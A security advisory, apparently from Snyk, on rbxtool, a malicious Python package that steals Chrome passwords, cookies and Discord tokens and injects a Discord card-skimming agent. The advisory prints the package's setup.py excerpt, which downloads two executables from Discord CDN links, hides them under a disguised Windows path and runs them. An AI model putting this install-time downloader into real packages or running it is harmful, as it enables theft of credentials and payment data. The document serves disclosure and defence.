Malicious Package Affecting rbxtool package, versions [0,]


Severity: critical

CVSS assessment made by Snyk's Security Team.

Threat Intelligence

Exploit Maturity: Mature

  • Snyk ID: SNYK-PYTHON-RBXTOOL-2980418
  • Published: 15 Aug 2022
  • Disclosed: 15 Aug 2022
  • Credit: Snyk Research Team

Introduced: 15 Aug 2022

Malicious; CVE: not available; CWE-506
First added by Snyk

How to fix?

Avoid using all malicious instances of the rbxtool package.

Overview

rbxtool is a malicious package. It is one of 12 malicious packages created by the same actor and discovered by Snyk. It downloads and executes malicious executables that attempt to steal information from Google Chrome, steal Discord tokens, and inject Discord malware.

These malicious packages attempted to avoid detection while infiltrating Windows machines and executing malicious executable files downloaded from the Discord content delivery network (CDN) onto the host.

These packages utilized PyInstaller to bundle a malicious application and its dependencies into one package. The purpose of PyInstaller here is twofold: to inhibit detection by bundling in dependencies instead of downloading them from a remote server to the host, and to provide an executable that is ready to run without an interpreter.

This malware targets data that is stored for everyday user applications. Upon execution, it will attempt to steal Google Chrome data (passwords, cookies, web history, search history, and bookmarks). This data is a common target for malicious actors as they can then use this data to pivot throughout accounts with the provided credentials.

The popular online chat application Discord is also a target. The malware exfiltrates Discord tokens and injects a persistent malicious agent into the process. This malicious code, known as Discord Injector, can relay an alarming amount of information to the attacker: not only does it share credentials, it can also skim credit card information that a user enters after the injector is loaded.

Malicious Code

The following excerpt from setup.py attempts to download and execute two binaries (ZYXMN.exe and ZYRBX.exe) from a Discord CDN:

url = 'https://cdn.discordapp.com/attachments/1003368479442874518/1003368774335991898/ZYXMN.exe'
url2 = 'https://cdn.discordapp.com/attachments/1003368479442874518/1003368773983682592/ZYRBX.exe'

# clear any copies left by a previous run
os.remove(r"C:$Windows.SXK\WIN-siP1VyGDrfCYO2k3.exe")
os.remove(r"C:$Windows.SXK\WIN-XnWfTdfJsypQWB9d.exe")

# fetch both binaries from the Discord CDN, write them to disk, move them to the staging path, delete the originals
r = requests.get(url, allow_redirects=True)
r2 = requests.get(url2, allow_redirects=True)
open('ZYXMN.exe', 'wb').write(r.content)
Path(r"ZYXMN.exe").rename(r"C:$Windows.SXK\WIN-siP1VyGDrfCYO2k3.exe")
open('ZYRBX.exe', 'wb').write(r2.content)
Path(r"ZYRBX.exe").rename(r"C:$Windows.SXK\WIN-XnWfTdfJsypQWB9d.exe")
os.remove('ZYRBX.exe')
os.remove('ZYXMN.exe')

# launch both binaries
os.startfile(r"C:$Windows.SXK\WIN-siP1VyGDrfCYO2k3.exe")
os.startfile(r"C:$Windows.SXK\WIN-XnWfTdfJsypQWB9d.exe")

# remove the directory (note the path differs from the one used above)
shutil.rmtree(r"C:$Windows.~SXK")

A full breakdown and explanation of these two executables is found in our writeup.

CVSS Scores: version 3.1